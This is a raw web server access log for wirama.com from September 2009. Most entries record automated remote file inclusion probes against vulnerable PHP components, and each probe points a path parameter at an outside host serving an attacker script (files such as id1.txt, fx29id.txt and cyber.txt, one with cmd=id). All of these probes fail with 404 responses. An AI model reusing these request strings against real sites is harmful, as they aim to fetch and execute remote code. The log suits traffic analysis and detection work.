190.144.44.36 - - [01/Sep/2009:07:30:26 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:07:30:26 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:07:30:42 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.winewise.de//administrator/modules/idi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
121.125.74.87 - - [01/Sep/2009:07:30:49 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.winewise.de//administrator/modules/idi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.202.2.220 - - [01/Sep/2009:07:30:56 -0700] "GET /logs/access_090701.log//admin/spaw/spaw_control.class.php?spaw_root=http://golden-j.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:31:44 -0700] "GET /jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:31:44 -0700] "GET /logs//jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:31:44 -0700] "GET /logs/access_090531.log//jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:32:02 -0700] "GET /jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:32:02 -0700] "GET /logs//jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.65.19.136 - - [01/Sep/2009:07:32:04 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.65.19.136 - - [01/Sep/2009:07:32:04 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.65.19.136 - - [01/Sep/2009:07:32:04 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:07:32:05 -0700] "GET /logs/access_090531.log//jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.65.19.136 - - [01/Sep/2009:07:32:13 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.225.196.53 - - [01/Sep/2009:07:32:27 -0700] "GET /logs/access_090531.log//jp_bbs/delete.php?dir=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:32:27 -0700] "GET /jp_bbs/delete.php?dir=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:32:27 -0700] "GET /logs//jp_bbs/delete.php?dir=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:33:44 -0700] "GET /jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:33:44 -0700] "GET /logs//jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:33:44 -0700] "GET /logs/access_090531.log%20%20//jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:07:35:20 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:07:35:20 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:07:35:20 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.230.158 - - [01/Sep/2009:07:35:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0" "wirama.com"
65.55.230.158 - - [01/Sep/2009:07:35:51 -0700] "GET /?D=D HTTP/1.1" 200 916 "-" "Mozilla/4.0" "wirama.com"
65.55.230.158 - - [01/Sep/2009:07:36:42 -0700] "GET /logs/access_090501.log HTTP/1.1" 200 131072 "-" "Mozilla/4.0" "wirama.com"
211.202.2.220 - - [01/Sep/2009:07:36:45 -0700] "GET /logs/access_090401.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://golden-j.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.202.2.220 - - [01/Sep/2009:07:38:55 -0700] "GET /logs/access_090701.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://golden-j.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:07:39:24 -0700] "GET /logs/access_090701.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.orstalumni.com/notice/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:07:39:24 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.orstalumni.com/notice/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:07:39:24 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.orstalumni.com/notice/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:40:28 -0700] "GET /logs/access_090701.log//jp_bbs/delete.php?dir=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
218.237.219.250 - - [01/Sep/2009:07:40:31 -0700] "GET /logs/delete.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
218.237.219.250 - - [01/Sep/2009:07:40:31 -0700] "GET /delete.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
218.237.219.250 - - [01/Sep/2009:07:40:32 -0700] "GET /logs/access_090701.log/delete.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:40:50 -0700] "GET /jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:40:50 -0700] "GET /logs//jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:07:40:50 -0700] "GET /logs/access_090531.log%20%20//jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
188.120.32.42 - - [01/Sep/2009:07:41:07 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
188.120.32.42 - - [01/Sep/2009:07:41:07 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
188.120.32.42 - - [01/Sep/2009:07:41:08 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.237.124.196 - - [01/Sep/2009:07:41:14 -0700] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.237.124.196 - - [01/Sep/2009:07:41:14 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.237.124.196 - - [01/Sep/2009:07:41:14 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
188.120.32.42 - - [01/Sep/2009:07:41:14 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:07:43:23 -0700] "GET /logs/access_090701.log%20%20//jp_bbs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.237.124.196 - - [01/Sep/2009:07:44:00 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
190.144.44.36 - - [01/Sep/2009:07:44:23 -0700] "GET /logs/access_090701.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.orstalumni.com/notice/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:07:44:23 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.orstalumni.com/notice/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:07:44:23 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.orstalumni.com/notice/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:46:48 -0700] "GET /delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:46:48 -0700] "GET /logs/access_090531.log/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:46:48 -0700] "GET /logs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:46:55 -0700] "GET /delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:46:55 -0700] "GET /logs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:46:55 -0700] "GET /logs/access_090531.log/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:46:58 -0700] "GET /delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:46:58 -0700] "GET /logs/access_090531.log%20%20/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:46:58 -0700] "GET /logs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:47:11 -0700] "GET /delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:47:11 -0700] "GET /logs/access_090531.log%20%20/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:47:11 -0700] "GET /logs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:48:14 -0700] "GET /logs/access_090701.log%20%20/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:48:19 -0700] "GET /logs/access_090701.log%20%20/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:49:24 -0700] "GET /logs/access_090531.log/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:49:24 -0700] "GET /logs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:49:24 -0700] "GET /delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
174.133.161.130 - - [01/Sep/2009:07:49:35 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
67.225.196.53 - - [01/Sep/2009:07:49:37 -0700] "GET /logs/access_090531.log/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:49:37 -0700] "GET /logs/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:49:37 -0700] "GET /delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.234.2.107 - - [01/Sep/2009:07:49:39 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.234.2.107 - - [01/Sep/2009:07:49:39 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.234.2.107 - - [01/Sep/2009:07:49:39 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.234.2.107 - - [01/Sep/2009:07:49:50 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.237.219.250 - - [01/Sep/2009:07:50:08 -0700] "GET /logs/access_090331.log/delete.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.72.216 - - [01/Sep/2009:07:52:15 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:52:15 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:52:15 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.225.196.53 - - [01/Sep/2009:07:52:31 -0700] "GET /logs/access_090531.log%20%20/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.6.123.186 - - [01/Sep/2009:07:52:31 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.6.123.186 - - [01/Sep/2009:07:52:31 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.6.123.186 - - [01/Sep/2009:07:52:31 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.6.123.186 - - [01/Sep/2009:07:52:36 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:52:41 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:52:41 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:52:41 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.225.196.53 - - [01/Sep/2009:07:52:48 -0700] "GET /logs/access_090531.log%20%20/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:53:29 -0700] "GET /logs/access_090701.log%20%20/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:07:53:42 -0700] "GET /logs/access_090701.log%20%20/delete.php?dir=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.237.219.250 - - [01/Sep/2009:07:54:50 -0700] "GET /logs/delete.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
218.237.219.250 - - [01/Sep/2009:07:54:50 -0700] "GET /delete.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:55:24 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:55:24 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:55:24 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:55:26 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:55:26 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:55:26 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:55:35 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:07:55:42 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.194.85.198 - - [01/Sep/2009:07:57:41 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
82.194.85.198 - - [01/Sep/2009:07:58:55 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
82.194.85.198 - - [01/Sep/2009:07:59:51 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:08:05:35 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
190.144.44.36 - - [01/Sep/2009:08:05:35 -0700] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
190.144.44.36 - - [01/Sep/2009:08:05:35 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.191.196.112 - - [01/Sep/2009:08:08:23 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bluepadma.com/t.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "wirama.com"
174.133.161.130 - - [01/Sep/2009:08:09:58 -0700] "GET /logs///skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
174.133.161.130 - - [01/Sep/2009:08:10:19 -0700] "GET /logs///skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
174.133.161.130 - - [01/Sep/2009:08:12:27 -0700] "GET /logs///skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:08:12:50 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.182 - - [01/Sep/2009:08:13:17 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:08:14:17 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
190.144.44.36 - - [01/Sep/2009:08:14:17 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
190.144.44.36 - - [01/Sep/2009:08:14:22 -0700] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.182 - - [01/Sep/2009:08:14:41 -0700] "GET /files/series_A.pdf HTTP/1.0" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:17:16 -0700] "GET /logs/access_090329.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:17:16 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:17:16 -0700] "GET /logs/access_090501.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
